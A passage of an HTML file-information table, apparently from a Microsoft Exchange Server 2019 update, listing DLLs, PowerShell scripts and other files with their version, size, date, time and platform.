applicable</td></tr><tr><td>Eext.15.0.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>507</td><td>01-Jan-2020</td><td>09:15</td><td>Not applicable</td></tr><tr><td>Eext.15.1.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>507</td><td>01-Jan-2020</td><td>09:15</td><td>Not applicable</td></tr><tr><td>Eext.15.2.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>507</td><td>01-Jan-2020</td><td>09:15</td><td>Not applicable</td></tr><tr><td>Eext.15.20.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>507</td><td>01-Jan-2020</td><td>09:15</td><td>Not applicable</td></tr><tr><td>Eext.8.1.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>507</td><td>01-Jan-2020</td><td>09:15</td><td>Not applicable</td></tr><tr><td>Eext.8.2.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>507</td><td>01-Jan-2020</td><td>09:15</td><td>Not applicable</td></tr><tr><td>Eext.8.3.microsoft.exchange.data.transport.versionpolicy.cfg</td><td>Not applicable</td><td>507</td><td>01-Jan-2020</td><td>09:15</td><td>Not 
applicable</td></tr><tr><td>Eext_policy.14.0.microsoft.exchange.data.transport.dll</td><td>15.2.464.10</td><td>12,672</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Eext_policy.14.1.microsoft.exchange.data.transport.dll</td><td>15.2.464.10</td><td>12,872</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Eext_policy.14.2.microsoft.exchange.data.transport.dll</td><td>15.2.464.10</td><td>12,672</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Eext_policy.14.3.microsoft.exchange.data.transport.dll</td><td>15.2.464.10</td><td>12,664</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Eext_policy.14.4.microsoft.exchange.data.transport.dll</td><td>15.2.464.10</td><td>12,664</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Eext_policy.15.0.microsoft.exchange.data.transport.dll</td><td>15.2.464.10</td><td>12,872</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Eext_policy.15.1.microsoft.exchange.data.transport.dll</td><td>15.2.464.10</td><td>12,872</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Eext_policy.15.2.microsoft.exchange.data.transport.dll</td><td>15.2.464.10</td><td>12,664</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Eext_policy.15.20.microsoft.exchange.data.transport.dll</td><td>15.2.464.10</td><td>13,176</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Eext_policy.8.1.microsoft.exchange.data.transport.dll</td><td>15.2.464.10</td><td>12,672</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Eext_policy.8.2.microsoft.exchange.data.transport.dll</td><td>15.2.464.10</td><td>12,872</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Eext_policy.8.3.microsoft.exchange.data.transport.dll</td><td>15.2.464.10</td><td>12,664</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Enableinmemorytracing.ps1</td><td>Not applicable</td><td>13,660</td><td>01-Jan-2020</td><td>10:50</td><td>Not 
applicable</td></tr><tr><td>Enable_antimalwarescanning.ps1</td><td>Not applicable</td><td>17,859</td><td>01-Jan-2020</td><td>10:50</td><td>Not applicable</td></tr><tr><td>Enable_basicauthtooauthconverterhttpmodule.ps1</td><td>Not applicable</td><td>18,588</td><td>01-Jan-2020</td><td>10:49</td><td>Not applicable</td></tr><tr><td>Enable_crossforestconnector.ps1</td><td>Not applicable</td><td>18,930</td><td>01-Jan-2020</td><td>10:50</td><td>Not applicable</td></tr><tr><td>Enable_outlookcertificateauthentication.ps1</td><td>Not applicable</td><td>22,912</td><td>01-Jan-2020</td><td>10:50</td><td>Not applicable</td></tr><tr><td>Enable_outsidein.ps1</td><td>Not applicable</td><td>13,643</td><td>01-Jan-2020</td><td>10:50</td><td>Not applicable</td></tr><tr><td>Engineupdateserviceinterfaces.dll</td><td>15.2.464.10</td><td>17,792</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Escprint.dll</td><td>15.2.464.10</td><td>20,352</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Ese.dll</td><td>15.2.464.10</td><td>3,741,776</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Eseback2.dll</td><td>15.2.464.10</td><td>350,072</td><td>01-Jan-2020</td><td>10:49</td><td>x64</td></tr><tr><td>Esebcli2.dll</td><td>15.2.464.10</td><td>318,536</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Eseperf.dll</td><td>15.2.464.10</td><td>108,920</td><td>01-Jan-2020</td><td>10:52</td><td>x64</td></tr><tr><td>Eseutil.exe</td><td>15.2.464.10</td><td>425,336</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Esevss.dll</td><td>15.2.464.10</td><td>44,416</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Etweseproviderresources.dll</td><td>15.2.464.10</td><td>101,448</td><td>01-Jan-2020</td><td>10:50</td><td>x64</td></tr><tr><td>Eventperf.dll</td><td>15.2.464.10</td><td>59,768</td><td>01-Jan-2020</td><td>10:50</td><td>x64</td></tr><tr><td>Exchange.depthtwo.types.ps1xml</td><td>Not 
applicable</td><td>40,417</td><td>01-Jan-2020</td><td>10:50</td><td>Not applicable</td></tr><tr><td>Exchange.format.ps1xml</td><td>Not applicable</td><td>649,998</td><td>01-Jan-2020</td><td>10:49</td><td>Not applicable</td></tr><tr><td>Exchange.partial.types.ps1xml</td><td>Not applicable</td><td>44,319</td><td>01-Jan-2020</td><td>10:49</td><td>Not applicable</td></tr><tr><td>Exchange.ps1</td><td>Not applicable</td><td>20,791</td><td>01-Jan-2020</td><td>10:49</td><td>Not applicable</td></tr><tr><td>Exchange.support.format.ps1xml</td><td>Not applicable</td><td>26,535</td><td>01-Jan-2020</td><td>10:51</td><td>Not applicable</td></tr><tr><td>Exchange.types.ps1xml</td><td>Not applicable</td><td>365,457</td><td>01-Jan-2020</td><td>10:49</td><td>Not applicable</td></tr><tr><td>Exchangeudfcommon.dll</td><td>15.2.464.10</td><td>122,744</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Exchangeudfs.dll</td><td>15.2.464.10</td><td>272,760</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Exchmem.dll</td><td>15.2.464.10</td><td>86,600</td><td>01-Jan-2020</td><td>10:47</td><td>x64</td></tr><tr><td>Exchsetupmsg.dll</td><td>15.2.464.10</td><td>19,320</td><td>01-Jan-2020</td><td>10:50</td><td>x64</td></tr><tr><td>Exdbfailureitemapi.dll</td><td>Not applicable</td><td>27,000</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Exdbmsg.dll</td><td>15.2.464.10</td><td>230,784</td><td>01-Jan-2020</td><td>10:49</td><td>x64</td></tr><tr><td>Exeventperfplugin.dll</td><td>15.2.464.10</td><td>25,464</td><td>01-Jan-2020</td><td>10:52</td><td>x64</td></tr><tr><td>Exmime.dll</td><td>15.2.464.10</td><td>364,920</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Exportedgeconfig.ps1</td><td>Not applicable</td><td>27,387</td><td>01-Jan-2020</td><td>10:50</td><td>Not applicable</td></tr><tr><td>Export_mailpublicfoldersformigration.ps1</td><td>Not applicable</td><td>18,894</td><td>01-Jan-2020</td><td>10:50</td><td>Not 
applicable</td></tr><tr><td>Export_modernpublicfolderstatistics.ps1</td><td>Not applicable</td><td>29,150</td><td>01-Jan-2020</td><td>10:50</td><td>Not applicable</td></tr><tr><td>Export_outlookclassification.ps1</td><td>Not applicable</td><td>14,682</td><td>01-Jan-2020</td><td>10:49</td><td>Not applicable</td></tr><tr><td>Export_publicfolderstatistics.ps1</td><td>Not applicable</td><td>23,421</td><td>01-Jan-2020</td><td>10:50</td><td>Not applicable</td></tr><tr><td>Export_retentiontags.ps1</td><td>Not applicable</td><td>17,336</td><td>01-Jan-2020</td><td>10:49</td><td>Not applicable</td></tr><tr><td>Exppw.dll</td><td>15.2.464.10</td><td>83,536</td><td>01-Jan-2020</td><td>10:48</td><td>x64</td></tr><tr><td>Exprfdll.dll</td><td>15.2.464.10</td><td>26,488</td><td>01-Jan-2020</td><td>10:52</td><td>x64</td></tr><tr><td>Exrpc32.dll</td><td>15.2.464.10</td><td>2,029,440</td><td>01-Jan-2020</td><td>10:49</td><td>x64</td></tr><tr><td>Exrw.dll</td><td>15.2.464.10</td><td>28,032</td><td>01-Jan-2020</td><td>10:48</td><td>x64</td></tr><tr><td>Exsetdata.dll</td><td>15.2.464.10</td><td>2,779,728</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Exsetup.exe</td><td>15.2.464.11</td><td>35,200</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Exsetupui.exe</td><td>15.2.464.11</td><td>472,136</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Extrace.dll</td><td>15.2.464.10</td><td>245,112</td><td>01-Jan-2020</td><td>10:47</td><td>x64</td></tr><tr><td>Ext_microsoft.exchange.data.transport.dll</td><td>15.2.464.10</td><td>601,464</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Exwatson.dll</td><td>15.2.464.10</td><td>44,920</td><td>01-Jan-2020</td><td>10:47</td><td>x64</td></tr><tr><td>Fastioext.dll</td><td>15.2.464.10</td><td>60,288</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Fil06f84122c94c91a0458cad45c22cce20</td><td>Not applicable</td><td>784,632</td><td>01-Jan-2020</td><td>10:52</td><td>Not 
applicable</td></tr><tr><td>Fil143a7a5d4894478a85eefc89a6539fc8</td><td>Not applicable</td><td>1,909,119</td><td>01-Jan-2020</td><td>10:52</td><td>Not applicable</td></tr><tr><td>Fil19f527f284a0bb584915f9994f4885c3</td><td>Not applicable</td><td>648,794</td><td>01-Jan-2020</td><td>10:52</td><td>Not applicable</td></tr><tr><td>Fil1a9540363a531e7fb18ffe600cffc3ce</td><td>Not applicable</td><td>358,405</td><td>01-Jan-2020</td><td>10:51</td><td>Not applicable</td></tr><tr><td>Fil220d95210c8697448312eee6628c815c</td><td>Not applicable</td><td>303,657</td><td>01-Jan-2020</td><td>10:51</td><td>Not applicable</td></tr><tr><td>Fil2cf5a31e239a45fabea48687373b547c</td><td>Not applicable</td><td>652,626</td><td>01-Jan-2020</td><td>10:52</td><td>Not applicable</td></tr><tr><td>Fil397f0b1f1d7bd44d6e57e496decea2ec</td><td>Not applicable</td><td>784,629</td><td>01-Jan-2020</td><td>10:52</td><td>Not applicable</td></tr><tr><td>Fil3ab126057b34eee68c4fd4b127ff7aee</td><td>Not applicable</td><td>784,605</td><td>01-Jan-2020</td><td>10:52</td><td>Not applicable</td></tr><tr><td>Fil41bb2e5743e3bde4ecb1e07a76c5a7a8</td><td>Not applicable</td><td>149,154</td><td>01-Jan-2020</td><td>10:51</td><td>Not applicable</td></tr><tr><td>Fil51669bfbda26e56e3a43791df94c1e9c</td><td>Not applicable</td><td>9,345</td><td>01-Jan-2020</td><td>10:52</td><td>Not applicable</td></tr><tr><td>Fil558cb84302edfc96e553bcfce2b85286</td><td>Not applicable</td><td>85,259</td><td>01-Jan-2020</td><td>10:52</td><td>Not applicable</td></tr><tr><td>Fil55ce217251b77b97a46e914579fc4c64</td><td>Not applicable</td><td>648,788</td><td>01-Jan-2020</td><td>10:51</td><td>Not applicable</td></tr><tr><td>Fil5a9e78a51a18d05bc36b5e8b822d43a8</td><td>Not applicable</td><td>1,596,145</td><td>01-Jan-2020</td><td>10:47</td><td>Not applicable</td></tr><tr><td>Fil5c7d10e5f1f9ada1e877c9aa087182a9</td><td>Not applicable</td><td>1,596,145</td><td>01-Jan-2020</td><td>10:47</td><td>Not 
applicable</td></tr><tr><td>Fil6569a92c80a1e14949e4282ae2cc699c</td><td>Not applicable</td><td>1,596,145</td><td>01-Jan-2020</td><td>10:47</td><td>Not applicable</td></tr><tr><td>Fil6a01daba551306a1e55f0bf6894f4d9f</td><td>Not applicable</td><td>648,764</td><td>01-Jan-2020</td><td>10:51</td><td>Not applicable</td></tr><tr><td>Fil8863143ea7cd93a5f197c9fff13686bf</td><td>Not applicable</td><td>648,794</td><td>01-Jan-2020</td><td>10:52</td><td>Not applicable</td></tr><tr><td>Fil8a8c76f225c7205db1000e8864c10038</td><td>Not applicable</td><td>1,596,145</td><td>01-Jan-2020</td><td>10:47</td><td>Not applicable</td></tr><tr><td>Fil8cd999415d36ba78a3ac16a080c47458</td><td>Not applicable</td><td>784,635</td><td>01-Jan-2020</td><td>10:51</td><td>Not applicable</td></tr><tr><td>Fil97913e630ff02079ce9889505a517ec0</td><td>Not applicable</td><td>1,596,145</td><td>01-Jan-2020</td><td>10:47</td><td>Not applicable</td></tr><tr><td>Filaa49badb2892075a28d58d06560f8da2</td><td>Not applicable</td><td>785,659</td><td>01-Jan-2020</td><td>10:51</td><td>Not applicable</td></tr><tr><td>Filae28aeed23ccb4b9b80accc2d43175b5</td><td>Not applicable</td><td>648,791</td><td>01-Jan-2020</td><td>10:51</td><td>Not applicable</td></tr><tr><td>Filb17f496f9d880a684b5c13f6b02d7203</td><td>Not applicable</td><td>784,635</td><td>01-Jan-2020</td><td>10:52</td><td>Not applicable</td></tr><tr><td>Filb94ca32f2654692263a5be009c0fe4ca</td><td>Not applicable</td><td>2,564,949</td><td>01-Jan-2020</td><td>10:51</td><td>Not applicable</td></tr><tr><td>Filbabdc4808eba0c4f18103f12ae955e5c</td><td>Not applicable</td><td>342,710,221</td><td>01-Jan-2020</td><td>10:51</td><td>Not applicable</td></tr><tr><td>Filc92cf2bf29bed21bd5555163330a3d07</td><td>Not applicable</td><td>652,644</td><td>01-Jan-2020</td><td>10:52</td><td>Not applicable</td></tr><tr><td>Filcc478d2a8346db20c4e2dc36f3400628</td><td>Not applicable</td><td>784,635</td><td>01-Jan-2020</td><td>10:51</td><td>Not 
applicable</td></tr><tr><td>Fild26cd6b13cfe2ec2a16703819da6d043</td><td>Not applicable</td><td>1,596,145</td><td>01-Jan-2020</td><td>10:47</td><td>Not applicable</td></tr><tr><td>Filf2719f9dc8f7b74df78ad558ad3ee8a6</td><td>Not applicable</td><td>785,641</td><td>01-Jan-2020</td><td>10:51</td><td>Not applicable</td></tr><tr><td>Filfa5378dc76359a55ef20cc34f8a23fee</td><td>Not applicable</td><td>1,427,187</td><td>01-Jan-2020</td><td>10:51</td><td>Not applicable</td></tr><tr><td>Filteringconfigurationcommands.ps1</td><td>Not applicable</td><td>18,231</td><td>01-Jan-2020</td><td>10:49</td><td>Not applicable</td></tr><tr><td>Filteringpowershell.dll</td><td>15.2.464.10</td><td>223,104</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Filteringpowershell.format.ps1xml</td><td>Not applicable</td><td>29,652</td><td>01-Jan-2020</td><td>10:51</td><td>Not applicable</td></tr><tr><td>Filtermodule.dll</td><td>15.2.464.10</td><td>180,304</td><td>01-Jan-2020</td><td>10:48</td><td>x64</td></tr><tr><td>Fipexeuperfctrresource.dll</td><td>15.2.464.10</td><td>15,224</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Fipexeventsresource.dll</td><td>15.2.464.10</td><td>45,136</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Fipexperfctrresource.dll</td><td>15.2.464.10</td><td>32,632</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Firewallres.dll</td><td>15.2.464.10</td><td>72,576</td><td>01-Jan-2020</td><td>10:49</td><td>x64</td></tr><tr><td>Fms.exe</td><td>15.2.464.10</td><td>1,350,216</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Forefrontactivedirectoryconnector.exe</td><td>15.2.464.10</td><td>111,184</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Fpsdiag.exe</td><td>15.2.464.10</td><td>19,024</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Fsccachedfilemanagedlocal.dll</td><td>15.2.464.10</td><td>822,136</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Fscconfigsupport.dll
</td><td>15.2.464.10</td><td>56,912</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Fscconfigurationserver.exe</td><td>15.2.464.10</td><td>431,208</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Fscconfigurationserverinterfaces.dll</td><td>15.2.464.10</td><td>15,744</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Fsccrypto.dll</td><td>15.2.464.10</td><td>208,760</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Fscipcinterfaceslocal.dll</td><td>15.2.464.10</td><td>28,536</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Fscipclocal.dll</td><td>15.2.464.10</td><td>38,480</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Fscsqmuploader.exe</td><td>15.2.464.10</td><td>453,504</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Getucpool.ps1</td><td>Not applicable</td><td>19,767</td><td>01-Jan-2020</td><td>10:49</td><td>Not applicable</td></tr><tr><td>Getvalidengines.ps1</td><td>Not applicable</td><td>13,566</td><td>01-Jan-2020</td><td>10:51</td><td>Not applicable</td></tr><tr><td>Get_antispamfilteringreport.ps1</td><td>Not applicable</td><td>15,793</td><td>01-Jan-2020</td><td>10:49</td><td>Not applicable</td></tr><tr><td>Get_antispamsclhistogram.ps1</td><td>Not applicable</td><td>14,639</td><td>01-Jan-2020</td><td>10:49</td><td>Not applicable</td></tr><tr><td>Get_antispamtopblockedsenderdomains.ps1</td><td>Not applicable</td><td>15,711</td><td>01-Jan-2020</td><td>10:50</td><td>Not applicable</td></tr><tr><td>Get_antispamtopblockedsenderips.ps1</td><td>Not applicable</td><td>14,759</td><td>01-Jan-2020</td><td>10:50</td><td>Not applicable</td></tr><tr><td>Get_antispamtopblockedsenders.ps1</td><td>Not applicable</td><td>15,482</td><td>01-Jan-2020</td><td>10:50</td><td>Not applicable</td></tr><tr><td>Get_antispamtoprblproviders.ps1</td><td>Not applicable</td><td>14,689</td><td>01-Jan-2020</td><td>10:50</td><td>Not 
applicable</td></tr><tr><td>Get_antispamtoprecipients.ps1</td><td>Not applicable</td><td>14,794</td><td>01-Jan-2020</td><td>10:49</td><td>Not applicable</td></tr><tr><td>Get_dleligibilitylist.ps1</td><td>Not applicable</td><td>42,332</td><td>01-Jan-2020</td><td>10:50</td><td>Not applicable</td></tr><tr><td>Get_exchangeetwtrace.ps1</td><td>Not applicable</td><td>29,251</td><td>01-Jan-2020</td><td>10:50</td><td>Not applicable</td></tr><tr><td>Get_publicfoldermailboxsize.ps1</td><td>Not applicable</td><td>15,322</td><td>01-Jan-2020</td><td>10:50</td><td>Not applicable</td></tr><tr><td>Get_storetrace.ps1</td><td>Not applicable</td><td>51,871</td><td>01-Jan-2020</td><td>10:51</td><td>Not applicable</td></tr><tr><td>Huffman_xpress.dll</td><td>15.2.464.10</td><td>32,640</td><td>01-Jan-2020</td><td>10:48</td><td>x64</td></tr><tr><td>Importedgeconfig.ps1</td><td>Not applicable</td><td>77,240</td><td>01-Jan-2020</td><td>10:50</td><td>Not applicable</td></tr><tr><td>Import_mailpublicfoldersformigration.ps1</td><td>Not applicable</td><td>29,812</td><td>01-Jan-2020</td><td>10:49</td><td>Not applicable</td></tr><tr><td>Import_retentiontags.ps1</td><td>Not applicable</td><td>29,114</td><td>01-Jan-2020</td><td>10:50</td><td>Not applicable</td></tr><tr><td>Inproxy.dll</td><td>15.2.464.10</td><td>85,888</td><td>01-Jan-2020</td><td>10:52</td><td>x64</td></tr><tr><td>Installwindowscomponent.ps1</td><td>Not applicable</td><td>34,519</td><td>01-Jan-2020</td><td>10:51</td><td>Not applicable</td></tr><tr><td>Install_antispamagents.ps1</td><td>Not applicable</td><td>17,913</td><td>01-Jan-2020</td><td>10:49</td><td>Not applicable</td></tr><tr><td>Install_odatavirtualdirectory.ps1</td><td>Not applicable</td><td>18,259</td><td>01-Jan-2020</td><td>10:51</td><td>Not applicable</td></tr><tr><td>Interop.activeds.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc</td><td>15.2.464.10</td><td>107,392</td><td>01-Jan-2020</td><td>10:47</td><td>Not 
applicable</td></tr><tr><td>Interop.adsiis.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc</td><td>15.2.464.10</td><td>20,352</td><td>01-Jan-2020</td><td>10:51</td><td>Not applicable</td></tr><tr><td>Interop.certenroll.dll</td><td>15.2.464.10</td><td>142,920</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Interop.licenseinfointerface.dll</td><td>15.2.464.10</td><td>14,416</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Interop.netfw.dll</td><td>15.2.464.10</td><td>34,384</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Interop.plalibrary.dll</td><td>15.2.464.10</td><td>72,576</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Interop.stdole2.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc</td><td>15.2.464.10</td><td>27,216</td><td>01-Jan-2020</td><td>10:51</td><td>Not applicable</td></tr><tr><td>Interop.taskscheduler.dll</td><td>15.2.464.10</td><td>46,696</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Interop.wuapilib.dll</td><td>15.2.464.10</td><td>61,008</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Interop.xenroll.dll</td><td>15.2.464.10</td><td>39,808</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Kerbauth.dll</td><td>15.2.464.10</td><td>63,056</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Licenseinfointerface.dll</td><td>15.2.464.10</td><td>643,448</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Lpversioning.xml</td><td>Not applicable</td><td>19,954</td><td>01-Jan-2020</td><td>10:51</td><td>Not applicable</td></tr><tr><td>Mailboxdatabasereseedusingspares.ps1</td><td>Not applicable</td><td>31,904</td><td>01-Jan-2020</td><td>10:51</td><td>Not applicable</td></tr><tr><td>Managedavailabilitycrimsonmsg.dll</td><td>15.2.464.10</td><td>138,824</td><td>01-Jan-2020</td><td>10:49</td><td>x64</td></tr><tr><td>Managedstorediagnosticfunctions.ps1</td><td>Not applicable</td><td>126,533</td><td>01-Jan-2020</td><td>10:51</td><td>Not 
applicable</td></tr><tr><td>Managescheduledtask.ps1</td><td>Not applicable</td><td>36,632</td><td>01-Jan-2020</td><td>10:51</td><td>Not applicable</td></tr><tr><td>Manage_metacachedatabase.ps1</td><td>Not applicable</td><td>51,298</td><td>01-Jan-2020</td><td>10:49</td><td>Not applicable</td></tr><tr><td>Mce.dll</td><td>15.2.464.10</td><td>1,693,776</td><td>01-Jan-2020</td><td>10:50</td><td>x64</td></tr><tr><td>Measure_storeusagestatistics.ps1</td><td>Not applicable</td><td>29,779</td><td>01-Jan-2020</td><td>10:51</td><td>Not applicable</td></tr><tr><td>Merge_publicfoldermailbox.ps1</td><td>Not applicable</td><td>22,915</td><td>01-Jan-2020</td><td>10:49</td><td>Not applicable</td></tr><tr><td>Microsoft.database.isam.dll</td><td>15.2.464.10</td><td>128,080</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.dkm.proxy.dll</td><td>15.2.464.10</td><td>25,984</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.activemonitoring.activemonitoringvariantconfig.dll</td><td>15.2.464.10</td><td>68,688</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.activemonitoring.eventlog.dll</td><td>15.2.464.10</td><td>17,792</td><td>01-Jan-2020</td><td>10:49</td><td>x64</td></tr><tr><td>Microsoft.exchange.addressbook.service.dll</td><td>15.2.464.11</td><td>233,544</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.addressbook.service.eventlog.dll</td><td>15.2.464.10</td><td>15,736</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.airsync.airsyncmsg.dll</td><td>15.2.464.10</td><td>43,384</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.airsync.comon.dll</td><td>15.2.464.10</td><td>1,776,000</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.airsync.dll1</td><td>15.2.464.11</td><td>505,216</td><td>01-Jan-2020</td><td>10:47</td><td>Not 
applicable</td></tr><tr><td>Microsoft.exchange.airsynchandler.dll</td><td>15.2.464.11</td><td>76,152</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.anchorservice.dll</td><td>15.2.464.10</td><td>135,544</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.antispam.eventlog.dll</td><td>15.2.464.10</td><td>23,416</td><td>01-Jan-2020</td><td>10:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.antispamupdate.eventlog.dll</td><td>15.2.464.10</td><td>15,952</td><td>01-Jan-2020</td><td>10:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.antispamupdatesvc.exe</td><td>15.2.464.10</td><td>27,008</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.approval.applications.dll</td><td>15.2.464.10</td><td>53,624</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.assistants.dll</td><td>15.2.464.10</td><td>925,264</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.assistants.eventlog.dll</td><td>15.2.464.10</td><td>26,192</td><td>01-Jan-2020</td><td>10:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.assistants.interfaces.dll</td><td>15.2.464.10</td><td>43,392</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.audit.azureclient.dll</td><td>15.2.464.11</td><td>15,440</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.auditlogsearch.eventlog.dll</td><td>15.2.464.10</td><td>14,712</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.auditlogsearchservicelet.dll</td><td>15.2.464.11</td><td>70,520</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.auditstoragemonitorservicelet.dll</td><td>15.2.464.11</td><td>94,584</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr>
<tr><td>Microsoft.exchange.auditstoragemonitorservicelet.eventlog.dll</td><td>15.2.464.10</td><td>13,384</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.authadmin.eventlog.dll</td><td>15.2.464.10</td><td>15,944</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.authadminservicelet.dll</td><td>15.2.464.11</td><td>36,728</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.authservicehostservicelet.dll</td><td>15.2.464.10</td><td>15,944</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.autodiscover.configuration.dll</td><td>15.2.464.10</td><td>79,736</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.autodiscover.dll</td><td>15.2.464.10</td><td>396,152</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.autodiscover.eventlogs.dll</td><td>15.2.464.10</td><td>21,368</td><td>01-Jan-2020</td><td>10:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.autodiscoverv2.dll</td><td>15.2.464.10</td><td>57,216</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.bandwidthmonitorservicelet.dll</td><td>15.2.464.10</td><td>14,720</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.batchservice.dll</td><td>15.2.464.10</td><td>35,912</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.cabutility.dll</td><td>15.2.464.10</td><td>276,344</td><td>01-Jan-2020</td><td>10:48</td><td>x64</td></tr><tr><td>Microsoft.exchange.certificatedeployment.eventlog.dll</td><td>15.2.464.10</td><td>16,248</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.certificatedeploymentservicelet.dll</td><td>15.2.464.11</td><td>26,192</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.certificatenotification.eventlog.dll</td><td>15.2.464.10</td><td>13,688</td><td>01-Jan-2020